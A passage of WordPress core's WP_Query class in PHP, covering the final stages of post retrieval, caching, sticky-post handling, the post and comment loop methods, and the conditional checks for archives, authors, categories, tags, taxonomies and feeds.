*
* See https://core.trac.wordpress.org/ticket/56841.
* See https://github.com/WordPress/wordpress-develop/pull/6393#issuecomment-2088217429
*/
$old_request =
"SELECT $found_rows $distinct $fields
FROM {$wpdb->posts} $join
WHERE 1=1 $where
$groupby
$orderby
$limits";
$this->request = $old_request;
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the completed SQL query before sending.
*
* @since 2.0.0
*
* @param string $request The complete SQL query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->request = apply_filters_ref_array( 'posts_request', array( $this->request, &$this ) );
}
/**
* Filters the posts array before the query takes place.
*
* Return a non-null value to bypass WordPress' default post queries.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_posts` and `max_num_pages` properties of the WP_Query object,
* passed to the filter by reference. If WP_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 4.6.0
*
* @param WP_Post[]|int[]|null $posts Return an array of post data to short-circuit WP's query,
* or null to allow WP to run its normal queries.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'posts_pre_query', array( null, &$this ) );
/*
* Ensure the ID database query is able to be cached.
*
* Random queries are expected to have unpredictable results and
* cannot be cached. Note the space before `RAND` in the string
* search, that to ensure against a collision with another
* function.
*
* If `$fields` has been modified by the `posts_fields`,
* `posts_fields_request`, `post_clauses` or `posts_clauses_request`
* filters, then caching is disabled to prevent caching collisions.
*/
$id_query_is_cacheable = ! str_contains( strtoupper( $orderby ), ' RAND(' );
$cacheable_field_values = array(
"{$wpdb->posts}.*",
"{$wpdb->posts}.ID, {$wpdb->posts}.post_parent",
"{$wpdb->posts}.ID",
);
if ( ! in_array( $fields, $cacheable_field_values, true ) ) {
$id_query_is_cacheable = false;
}
$last_changed = (array) wp_cache_get_last_changed( 'posts' );
if ( ! empty( $this->tax_query->queries ) ) {
$last_changed[] = wp_cache_get_last_changed( 'terms' );
}
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$new_request = str_replace( $fields, "{$wpdb->posts}.*", $this->request );
$cache_key = $this->generate_cache_key( $query_vars, $new_request );
$cache_found = false;
if ( null === $this->posts ) {
$cached_results = wp_cache_get_salted( $cache_key, 'post-queries', $last_changed );
if ( $cached_results ) {
$cache_found = true;
/** @var int[] */
$post_ids = array_map( 'intval', $cached_results['posts'] );
$this->post_count = count( $post_ids );
$this->found_posts = $cached_results['found_posts'];
$this->max_num_pages = $cached_results['max_num_pages'];
if ( 'ids' === $query_vars['fields'] ) {
$this->posts = $post_ids;
return $this->posts;
} elseif ( 'id=>parent' === $query_vars['fields'] ) {
_prime_post_parent_id_caches( $post_ids );
$post_parent_cache_keys = array();
foreach ( $post_ids as $post_id ) {
$post_parent_cache_keys[] = 'post_parent:' . (string) $post_id;
}
/** @var int[] */
$post_parents = wp_cache_get_multiple( $post_parent_cache_keys, 'posts' );
foreach ( $post_parents as $cache_key => $post_parent ) {
$obj = new stdClass();
$obj->ID = (int) str_replace( 'post_parent:', '', $cache_key );
$obj->post_parent = (int) $post_parent;
$this->posts[] = $obj;
}
return $post_parents;
} else {
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $post_ids );
}
}
}
}
if ( 'ids' === $query_vars['fields'] ) {
if ( null === $this->posts ) {
$this->posts = $wpdb->get_col( $this->request );
}
/** @var int[] */
$this->posts = array_map( 'intval', $this->posts );
$this->post_count = count( $this->posts );
$this->set_found_posts( $query_vars, $limits );
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$cache_value = array(
'posts' => $this->posts,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
return $this->posts;
}
if ( 'id=>parent' === $query_vars['fields'] ) {
if ( null === $this->posts ) {
$this->posts = $wpdb->get_results( $this->request );
}
$this->post_count = count( $this->posts );
$this->set_found_posts( $query_vars, $limits );
/** @var int[] */
$post_parents = array();
$post_ids = array();
$post_parents_cache = array();
foreach ( $this->posts as $key => $post ) {
$this->posts[ $key ]->ID = (int) $post->ID;
$this->posts[ $key ]->post_parent = (int) $post->post_parent;
$post_parents[ (int) $post->ID ] = (int) $post->post_parent;
$post_ids[] = (int) $post->ID;
$post_parents_cache[ 'post_parent:' . (string) $post->ID ] = (int) $post->post_parent;
}
// Prime post parent caches, so that on second run, there is not another database query.
wp_cache_add_multiple( $post_parents_cache, 'posts' );
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$cache_value = array(
'posts' => $post_ids,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
return $post_parents;
}
$is_unfiltered_query = $old_request === $this->request && "{$wpdb->posts}.*" === $fields;
if ( null === $this->posts ) {
$split_the_query = (
$is_unfiltered_query
&& (
wp_using_ext_object_cache()
|| ( ! empty( $limits ) && $query_vars['posts_per_page'] < 500 )
)
);
/**
* Filters whether to split the query.
*
* Splitting the query will cause it to fetch just the IDs of the found posts
* (and then individually fetch each post by ID), rather than fetching every
* complete row at once. One massive result vs. many small results.
*
* @since 3.4.0
* @since 6.6.0 Added the `$old_request` and `$clauses` parameters.
*
* @param bool $split_the_query Whether or not to split the query.
* @param WP_Query $query The WP_Query instance.
* @param string $old_request The complete SQL query before filtering.
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
*/
$split_the_query = apply_filters( 'split_the_query', $split_the_query, $this, $old_request, compact( $pieces ) );
if ( $split_the_query ) {
// First get the IDs and then fill in the objects.
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"SELECT $found_rows $distinct {$wpdb->posts}.ID
FROM {$wpdb->posts} $join
WHERE 1=1 $where
$groupby
$orderby
$limits";
/**
* Filters the Post IDs SQL request before sending.
*
* @since 3.4.0
*
* @param string $request The post ID request.
* @param WP_Query $query The WP_Query instance.
*/
$this->request = apply_filters( 'posts_request_ids', $this->request, $this );
$post_ids = $wpdb->get_col( $this->request );
if ( $post_ids ) {
$this->posts = $post_ids;
$this->set_found_posts( $query_vars, $limits );
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
} else {
$this->posts = array();
}
} else {
$this->posts = $wpdb->get_results( $this->request );
$this->set_found_posts( $query_vars, $limits );
}
}
// Convert to WP_Post objects.
if ( $this->posts ) {
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $this->posts );
}
$unfiltered_posts = $this->posts;
if ( $query_vars['cache_results'] && $id_query_is_cacheable && ! $cache_found ) {
$post_ids = wp_list_pluck( $this->posts, 'ID' );
$cache_value = array(
'posts' => $post_ids,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the raw post results array, prior to status checks.
*
* @since 2.3.0
*
* @param WP_Post[] $posts Array of post objects.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'posts_results', array( $this->posts, &$this ) );
}
if ( ! empty( $this->posts ) && $this->is_comment_feed && $this->is_singular ) {
/** This filter is documented in wp-includes/query.php */
$cjoin = apply_filters_ref_array( 'comment_feed_join', array( '', &$this ) );
/** This filter is documented in wp-includes/query.php */
$cwhere = apply_filters_ref_array( 'comment_feed_where', array( "WHERE comment_post_ID = '{$this->posts[0]->ID}' AND comment_approved = '1'", &$this ) );
/** This filter is documented in wp-includes/query.php */
$cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( '', &$this ) );
$cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : '';
/** This filter is documented in wp-includes/query.php */
$corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) );
$corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : '';
/** This filter is documented in wp-includes/query.php */
$climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) );
$comments_request = "SELECT {$wpdb->comments}.comment_ID FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits";
$comment_key = md5( $comments_request );
$comment_last_changed = wp_cache_get_last_changed( 'comment' );
$comment_cache_key = "comment_feed:$comment_key";
$comment_ids = wp_cache_get_salted( $comment_cache_key, 'comment-queries', $comment_last_changed );
if ( false === $comment_ids ) {
$comment_ids = $wpdb->get_col( $comments_request );
wp_cache_set_salted( $comment_cache_key, $comment_ids, 'comment-queries', $comment_last_changed );
}
_prime_comment_caches( $comment_ids );
// Convert to WP_Comment.
/** @var WP_Comment[] */
$this->comments = array_map( 'get_comment', $comment_ids );
$this->comment_count = count( $this->comments );
}
// Check post status to determine if post should be displayed.
if ( ! empty( $this->posts ) && ( $this->is_single || $this->is_page ) ) {
$status = get_post_status( $this->posts[0] );
if ( 'attachment' === $this->posts[0]->post_type && 0 === (int) $this->posts[0]->post_parent ) {
$this->is_page = false;
$this->is_single = true;
$this->is_attachment = true;
}
// If the post_status was specifically requested, let it pass through.
if ( ! in_array( $status, $q_status, true ) ) {
$post_status_obj = get_post_status_object( $status );
if ( $post_status_obj && ! $post_status_obj->public ) {
if ( ! is_user_logged_in() ) {
// User must be logged in to view unpublished posts.
$this->posts = array();
} else {
if ( $post_status_obj->protected ) {
// User must have edit permissions on the draft to preview.
if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
} else {
$this->is_preview = true;
if ( 'future' !== $status ) {
$this->posts[0]->post_date = current_time( 'mysql' );
}
}
} elseif ( $post_status_obj->private ) {
if ( ! current_user_can( $read_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
}
} else {
$this->posts = array();
}
}
} elseif ( ! $post_status_obj ) {
// Post status is not registered, assume it's not public.
if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
}
}
}
if ( $this->is_preview && $this->posts && current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
/**
* Filters the single post for preview mode.
*
* @since 2.7.0
*
* @param WP_Post $post_preview The Post object.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts[0] = get_post( apply_filters_ref_array( 'the_preview', array( $this->posts[0], &$this ) ) );
}
}
// Put sticky posts at the top of the posts array.
$sticky_posts = get_option( 'sticky_posts' );
if ( $this->is_home && $page <= 1 && is_array( $sticky_posts ) && ! empty( $sticky_posts ) && ! $query_vars['ignore_sticky_posts'] ) {
$num_posts = count( $this->posts );
$sticky_offset = 0;
// Loop over posts and relocate stickies to the front.
for ( $i = 0; $i < $num_posts; $i++ ) {
if ( in_array( $this->posts[ $i ]->ID, $sticky_posts, true ) ) {
$sticky_post = $this->posts[ $i ];
// Remove sticky from current position.
array_splice( $this->posts, $i, 1 );
// Move to front, after other stickies.
array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) );
// Increment the sticky offset. The next sticky will be placed at this offset.
++$sticky_offset;
// Remove post from sticky posts array.
$offset = array_search( $sticky_post->ID, $sticky_posts, true );
unset( $sticky_posts[ $offset ] );
}
}
// If any posts have been excluded specifically, Ignore those that are sticky.
if ( ! empty( $sticky_posts ) && ! empty( $query_vars['post__not_in'] ) ) {
$sticky_posts = array_diff( $sticky_posts, $query_vars['post__not_in'] );
}
// Fetch sticky posts that weren't in the query results.
if ( ! empty( $sticky_posts ) ) {
$stickies = get_posts(
array(
'post__in' => $sticky_posts,
'post_type' => $post_type,
'post_status' => 'publish',
'posts_per_page' => count( $sticky_posts ),
'suppress_filters' => $query_vars['suppress_filters'],
'cache_results' => $query_vars['cache_results'],
'update_post_meta_cache' => $query_vars['update_post_meta_cache'],
'update_post_term_cache' => $query_vars['update_post_term_cache'],
'lazy_load_term_meta' => $query_vars['lazy_load_term_meta'],
)
);
foreach ( $stickies as $sticky_post ) {
array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) );
++$sticky_offset;
}
}
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the array of retrieved posts after they've been fetched and
* internally processed.
*
* @since 1.5.0
*
* @param WP_Post[] $posts Array of post objects.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'the_posts', array( $this->posts, &$this ) );
}
/*
* Ensure that any posts added/modified via one of the filters above are
* of the type WP_Post and are filtered.
*/
if ( $this->posts ) {
$this->post_count = count( $this->posts );
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $this->posts );
if ( $query_vars['cache_results'] ) {
if ( $is_unfiltered_query && $unfiltered_posts === $this->posts ) {
update_post_caches( $this->posts, $post_type, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
} else {
$post_ids = wp_list_pluck( $this->posts, 'ID' );
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
}
}
/** @var WP_Post */
$this->post = reset( $this->posts );
} else {
$this->post_count = 0;
$this->posts = array();
}
if ( ! empty( $this->posts ) && $query_vars['update_menu_item_cache'] ) {
update_menu_item_cache( $this->posts );
}
if ( $query_vars['lazy_load_term_meta'] ) {
wp_queue_posts_for_term_meta_lazyload( $this->posts );
}
return $this->posts;
}
/**
* Sets up the amount of found posts and the number of pages (if limit clause was used)
* for the current query.
*
* @since 3.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @param string $limits LIMIT clauses of the query.
*/
private function set_found_posts( $query_vars, $limits ) {
global $wpdb;
/*
* Bail if posts is an empty array. Continue if posts is an empty string,
* null, or false to accommodate caching plugins that fill posts later.
*/
if ( $query_vars['no_found_rows'] || ( is_array( $this->posts ) && ! $this->posts ) ) {
return;
}
if ( ! empty( $limits ) ) {
/**
* Filters the query to run for retrieving the found posts.
*
* @since 2.1.0
*
* @param string $found_posts_query The query to run to find the found posts.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$found_posts_query = apply_filters_ref_array( 'found_posts_query', array( 'SELECT FOUND_ROWS()', &$this ) );
$this->found_posts = (int) $wpdb->get_var( $found_posts_query );
} else {
if ( is_array( $this->posts ) ) {
$this->found_posts = count( $this->posts );
} else {
if ( null === $this->posts ) {
$this->found_posts = 0;
} else {
$this->found_posts = 1;
}
}
}
/**
* Filters the number of found posts for the query.
*
* @since 2.1.0
*
* @param int $found_posts The number of posts found.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->found_posts = (int) apply_filters_ref_array( 'found_posts', array( $this->found_posts, &$this ) );
if ( ! empty( $limits ) ) {
$this->max_num_pages = (int) ceil( $this->found_posts / $query_vars['posts_per_page'] );
}
}
/**
* Sets up the next post and iterate current post index.
*
* @since 1.5.0
*
* @return WP_Post Next post.
*/
public function next_post() {
++$this->current_post;
/** @var WP_Post */
$this->post = $this->posts[ $this->current_post ];
return $this->post;
}
/**
* Sets up the current post.
*
* Retrieves the next post, sets up the post, sets the 'in the loop'
* property to true.
*
* @since 1.5.0
*
* @global WP_Post $post Global post object.
*/
public function the_post() {
global $post;
if ( ! $this->in_the_loop ) {
if ( 'all' === $this->query_vars['fields'] ) {
// Full post objects queried.
$post_objects = $this->posts;
} else {
if ( 'ids' === $this->query_vars['fields'] ) {
// Post IDs queried.
$post_ids = $this->posts;
} else {
// Only partial objects queried, need to prime the cache for the loop.
$post_ids = array_reduce(
$this->posts,
function ( $carry, $post ) {
if ( isset( $post->ID ) ) {
$carry[] = $post->ID;
}
return $carry;
},
array()
);
}
_prime_post_caches( $post_ids, $this->query_vars['update_post_term_cache'], $this->query_vars['update_post_meta_cache'] );
$post_objects = array_map( 'get_post', $post_ids );
}
update_post_author_caches( $post_objects );
}
$this->in_the_loop = true;
$this->before_loop = false;
if ( -1 === $this->current_post ) { // Loop has just started.
/**
* Fires once the loop is started.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'loop_start', array( &$this ) );
}
$post = $this->next_post();
// Ensure a full post object is available.
if ( 'all' !== $this->query_vars['fields'] ) {
if ( 'ids' === $this->query_vars['fields'] ) {
// Post IDs queried.
$post = get_post( $post );
} elseif ( isset( $post->ID ) ) {
/*
* Partial objecct queried.
*
* The post object was queried with a partial set of
* fields, populate the entire object for the loop.
*/
$post = get_post( $post->ID );
}
}
// Set up the global post object for the loop.
$this->setup_postdata( $post );
}
/**
* Determines whether there are more posts available in the loop.
*
* Calls the {@see 'loop_end'} action when the loop is complete.
*
* @since 1.5.0
*
* @return bool True if posts are available, false if end of the loop.
*/
public function have_posts() {
if ( $this->current_post + 1 < $this->post_count ) {
return true;
} elseif ( $this->current_post + 1 === $this->post_count && $this->post_count > 0 ) {
/**
* Fires once the loop has ended.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'loop_end', array( &$this ) );
// Do some cleaning up after the loop.
$this->rewind_posts();
} elseif ( 0 === $this->post_count ) {
$this->before_loop = false;
/**
* Fires if no results are found in a post query.
*
* @since 4.9.0
*
* @param WP_Query $query The WP_Query instance.
*/
do_action( 'loop_no_results', $this );
}
$this->in_the_loop = false;
return false;
}
/**
* Rewinds the posts and resets post index.
*
* @since 1.5.0
*/
public function rewind_posts() {
$this->current_post = -1;
if ( $this->post_count > 0 ) {
$this->post = $this->posts[0];
}
}
/**
* Iterates current comment index and returns WP_Comment object.
*
* @since 2.2.0
*
* @return WP_Comment Comment object.
*/
public function next_comment() {
++$this->current_comment;
/** @var WP_Comment */
$this->comment = $this->comments[ $this->current_comment ];
return $this->comment;
}
/**
* Sets up the current comment.
*
* @since 2.2.0
*
* @global WP_Comment $comment Global comment object.
*/
public function the_comment() {
global $comment;
$comment = $this->next_comment();
if ( 0 === $this->current_comment ) {
/**
* Fires once the comment loop is started.
*
* @since 2.2.0
*/
do_action( 'comment_loop_start' );
}
}
/**
* Determines whether there are more comments available.
*
* Automatically rewinds comments when finished.
*
* @since 2.2.0
*
* @return bool True if comments are available, false if no more comments.
*/
public function have_comments() {
if ( $this->current_comment + 1 < $this->comment_count ) {
return true;
} elseif ( $this->current_comment + 1 === $this->comment_count ) {
$this->rewind_comments();
}
return false;
}
/**
* Rewinds the comments, resets the comment index and comment to first.
*
* @since 2.2.0
*/
public function rewind_comments() {
$this->current_comment = -1;
if ( $this->comment_count > 0 ) {
$this->comment = $this->comments[0];
}
}
/**
* Sets up the WordPress query by parsing query string.
*
* @since 1.5.0
*
* @see WP_Query::parse_query() for all available arguments.
*
* @param string|array $query URL query string or array of query arguments.
* @return WP_Post[]|int[] Array of post objects or post IDs.
*/
public function query( $query ) {
$this->init();
$this->query = wp_parse_args( $query );
$this->query_vars = $this->query;
return $this->get_posts();
}
/**
* Retrieves the currently queried object.
*
* If queried object is not set, then the queried object will be set from
* the category, tag, taxonomy, posts page, single post, page, or author
* query variable. After it is set up, it will be returned.
*
* @since 1.5.0
*
* @return WP_Term|WP_Post_Type|WP_Post|WP_User|null The queried object.
*/
public function get_queried_object() {
if ( isset( $this->queried_object ) ) {
return $this->queried_object;
}
$this->queried_object = null;
$this->queried_object_id = null;
if ( $this->is_category || $this->is_tag || $this->is_tax ) {
if ( $this->is_category ) {
$cat = $this->get( 'cat' );
$category_name = $this->get( 'category_name' );
if ( $cat ) {
$term = get_term( $cat, 'category' );
} elseif ( $category_name ) {
$term = get_term_by( 'slug', $category_name, 'category' );
}
} elseif ( $this->is_tag ) {
$tag_id = $this->get( 'tag_id' );
$tag = $this->get( 'tag' );
if ( $tag_id ) {
$term = get_term( $tag_id, 'post_tag' );
} elseif ( $tag ) {
$term = get_term_by( 'slug', $tag, 'post_tag' );
}
} else {
// For other tax queries, grab the first term from the first clause.
if ( ! empty( $this->tax_query->queried_terms ) ) {
$queried_taxonomies = array_keys( $this->tax_query->queried_terms );
$matched_taxonomy = reset( $queried_taxonomies );
$query = $this->tax_query->queried_terms[ $matched_taxonomy ];
if ( ! empty( $query['terms'] ) ) {
if ( 'term_id' === $query['field'] ) {
$term = get_term( reset( $query['terms'] ), $matched_taxonomy );
} else {
$term = get_term_by( $query['field'], reset( $query['terms'] ), $matched_taxonomy );
}
}
}
}
if ( ! empty( $term ) && ! is_wp_error( $term ) ) {
$this->queried_object = $term;
$this->queried_object_id = (int) $term->term_id;
if ( $this->is_category && 'category' === $this->queried_object->taxonomy ) {
_make_cat_compat( $this->queried_object );
}
}
} elseif ( $this->is_post_type_archive ) {
$post_type = $this->get( 'post_type' );
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$this->queried_object = get_post_type_object( $post_type );
} elseif ( $this->is_posts_page ) {
$page_for_posts = get_option( 'page_for_posts' );
$this->queried_object = get_post( $page_for_posts );
$this->queried_object_id = (int) $this->queried_object->ID;
} elseif ( $this->is_singular && ! empty( $this->post ) ) {
$this->queried_object = $this->post;
$this->queried_object_id = (int) $this->post->ID;
} elseif ( $this->is_author ) {
$author = (int) $this->get( 'author' );
$author_name = $this->get( 'author_name' );
if ( $author ) {
$this->queried_object_id = $author;
} elseif ( $author_name ) {
$user = get_user_by( 'slug', $author_name );
if ( $user ) {
$this->queried_object_id = $user->ID;
}
}
$this->queried_object = get_userdata( $this->queried_object_id );
}
return $this->queried_object;
}
/**
* Retrieves the ID of the currently queried object.
*
* @since 1.5.0
*
* @return int
*/
public function get_queried_object_id() {
$this->get_queried_object();
if ( isset( $this->queried_object_id ) ) {
return $this->queried_object_id;
}
return 0;
}
/**
* Constructor.
*
* Sets up the WordPress query, if parameter is not empty.
*
* @since 1.5.0
*
* @see WP_Query::parse_query() for all available arguments.
*
* @param string|array $query URL query string or array of vars.
*/
public function __construct( $query = '' ) {
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Makes private properties readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Property to get.
* @return mixed Property.
*/
public function __get( $name ) {
if ( in_array( $name, $this->compat_fields, true ) ) {
return $this->$name;
}
}
/**
* Makes private properties checkable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Property to check if set.
* @return bool Whether the property is set.
*/
public function __isset( $name ) {
if ( in_array( $name, $this->compat_fields, true ) ) {
return isset( $this->$name );
}
return false;
}
/**
* Makes private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return mixed|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( in_array( $name, $this->compat_methods, true ) ) {
return $this->$name( ...$arguments );
}
return false;
}
/**
* Determines whether the query is for an existing archive page.
*
* Archive pages include category, tag, author, date, custom post type,
* and custom taxonomy based archives.
*
* @since 3.1.0
*
* @see WP_Query::is_category()
* @see WP_Query::is_tag()
* @see WP_Query::is_author()
* @see WP_Query::is_date()
* @see WP_Query::is_post_type_archive()
* @see WP_Query::is_tax()
*
* @return bool Whether the query is for an existing archive page.
*/
public function is_archive() {
return (bool) $this->is_archive;
}
/**
* Determines whether the query is for an existing post type archive page.
*
* @since 3.1.0
*
* @param string|string[] $post_types Optional. Post type or array of posts types
* to check against. Default empty.
* @return bool Whether the query is for an existing post type archive page.
*/
public function is_post_type_archive( $post_types = '' ) {
if ( empty( $post_types ) || ! $this->is_post_type_archive ) {
return (bool) $this->is_post_type_archive;
}
$post_type = $this->get( 'post_type' );
if ( is_array( $post_type ) ) {
$post_type = reset( $post_type );
}
$post_type_object = get_post_type_object( $post_type );
if ( ! $post_type_object ) {
return false;
}
return in_array( $post_type_object->name, (array) $post_types, true );
}
/**
* Determines whether the query is for an existing attachment page.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $attachment Optional. Attachment ID, title, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing attachment page.
*/
public function is_attachment( $attachment = '' ) {
if ( ! $this->is_attachment ) {
return false;
}
if ( empty( $attachment ) ) {
return true;
}
$attachment = array_map( 'strval', (array) $attachment );
$post_obj = $this->get_queried_object();
if ( ! $post_obj ) {
return false;
}
if ( in_array( (string) $post_obj->ID, $attachment, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_title, $attachment, true ) ) {
return true;
} elseif ( in_array( $post_obj->post_name, $attachment, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing author archive page.
*
* If the $author parameter is specified, this function will additionally
* check if the query is for one of the authors specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $author Optional. User ID, nickname, nicename, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing author archive page.
*/
public function is_author( $author = '' ) {
if ( ! $this->is_author ) {
return false;
}
if ( empty( $author ) ) {
return true;
}
$author_obj = $this->get_queried_object();
if ( ! $author_obj ) {
return false;
}
$author = array_map( 'strval', (array) $author );
if ( in_array( (string) $author_obj->ID, $author, true ) ) {
return true;
} elseif ( in_array( $author_obj->nickname, $author, true ) ) {
return true;
} elseif ( in_array( $author_obj->user_nicename, $author, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing category archive page.
*
* If the $category parameter is specified, this function will additionally
* check if the query is for one of the categories specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $category Optional. Category ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing category archive page.
*/
public function is_category( $category = '' ) {
if ( ! $this->is_category ) {
return false;
}
if ( empty( $category ) ) {
return true;
}
$cat_obj = $this->get_queried_object();
if ( ! $cat_obj ) {
return false;
}
$category = array_map( 'strval', (array) $category );
if ( in_array( (string) $cat_obj->term_id, $category, true ) ) {
return true;
} elseif ( in_array( $cat_obj->name, $category, true ) ) {
return true;
} elseif ( in_array( $cat_obj->slug, $category, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing tag archive page.
*
* If the $tag parameter is specified, this function will additionally
* check if the query is for one of the tags specified.
*
* @since 3.1.0
*
* @param int|string|int[]|string[] $tag Optional. Tag ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing tag archive page.
*/
public function is_tag( $tag = '' ) {
if ( ! $this->is_tag ) {
return false;
}
if ( empty( $tag ) ) {
return true;
}
$tag_obj = $this->get_queried_object();
if ( ! $tag_obj ) {
return false;
}
$tag = array_map( 'strval', (array) $tag );
if ( in_array( (string) $tag_obj->term_id, $tag, true ) ) {
return true;
} elseif ( in_array( $tag_obj->name, $tag, true ) ) {
return true;
} elseif ( in_array( $tag_obj->slug, $tag, true ) ) {
return true;
}
return false;
}
/**
* Determines whether the query is for an existing custom taxonomy archive page.
*
* If the $taxonomy parameter is specified, this function will additionally
* check if the query is for that specific $taxonomy.
*
* If the $term parameter is specified in addition to the $taxonomy parameter,
* this function will additionally check if the query is for one of the terms
* specified.
*
* @since 3.1.0
*
* @global WP_Taxonomy[] $wp_taxonomies Registered taxonomies.
*
* @param string|string[] $taxonomy Optional. Taxonomy slug or slugs to check against.
* Default empty.
* @param int|string|int[]|string[] $term Optional. Term ID, name, slug, or array of such
* to check against. Default empty.
* @return bool Whether the query is for an existing custom taxonomy archive page.
* True for custom taxonomy archive pages, false for built-in taxonomies
* (category and tag archives).
*/
public function is_tax( $taxonomy = '', $term = '' ) {
global $wp_taxonomies;
if ( ! $this->is_tax ) {
return false;
}
if ( empty( $taxonomy ) ) {
return true;
}
$queried_object = $this->get_queried_object();
$tax_array = array_intersect( array_keys( $wp_taxonomies ), (array) $taxonomy );
$term_array = (array) $term;
// Check that the taxonomy matches.
if ( ! ( isset( $queried_object->taxonomy ) && count( $tax_array ) && in_array( $queried_object->taxonomy, $tax_array, true ) ) ) {
return false;
}
// Only a taxonomy provided.
if ( empty( $term ) ) {
return true;
}
return isset( $queried_object->term_id ) &&
count(
array_intersect(
array( $queried_object->term_id, $queried_object->name, $queried_object->slug ),
$term_array
)
);
}
/**
* Determines whether the current URL is within the comments popup window.
*
* @since 3.1.0
* @deprecated 4.5.0
*
* @return false Always returns false.
*/
public function is_comments_popup() {
_deprecated_function( __FUNCTION__, '4.5.0' );
return false;
}
/**
* Determines whether the query is for an existing date archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing date archive.
*/
public function is_date() {
return (bool) $this->is_date;
}
/**
* Determines whether the query is for an existing day archive.
*
* @since 3.1.0
*
* @return bool Whether the query is for an existing day archive.
*/
public function is_day() {
return (bool) $this->is_day;
}
/**
* Determines whether the query is for a feed.
*
* @since 3.1.0
*
* @param string|string[] $feeds Optional. Feed type or array of feed types
* to check against. Default empty.
* @return bool Whether the query is for a feed.
*/
public function is_feed( $feeds = '' ) {
if ( empty( $feeds ) || ! $this->is_feed ) {
return (bool) $this->is_feed;
}
$query_var = $this->get( 'feed' );
if ( 'feed' === $query_var ) {
$query_var = get_default_feed();
}
return in_array( $query_var, (array) $feeds, true );
}
/**
* Determines whether the query is for a comments feed.
*
* @since 3.1.0
*
* @return bool Whether the query is for a comments feed.
*/
public function is_comment_feed() {
return (bool) $this->is_comment_feed;
}
/**
* Determines whether the query is for the front page of the site.
*
* This is for what is displayed at your site's main URL.
*
* Depends on the site's "Front page displays" Reading Settings 'show_on_front' and 'page_on_front'.
*
* If you set a static page for the front page of your site, this function will return
* true when viewing that page.
*
* Otherwise the same as {@see WP_Query::is_home()}.
*
* @since 3.1.0
*
* @return bool Whether the query is for the front page of the site.
*/
public function is_front_page() {
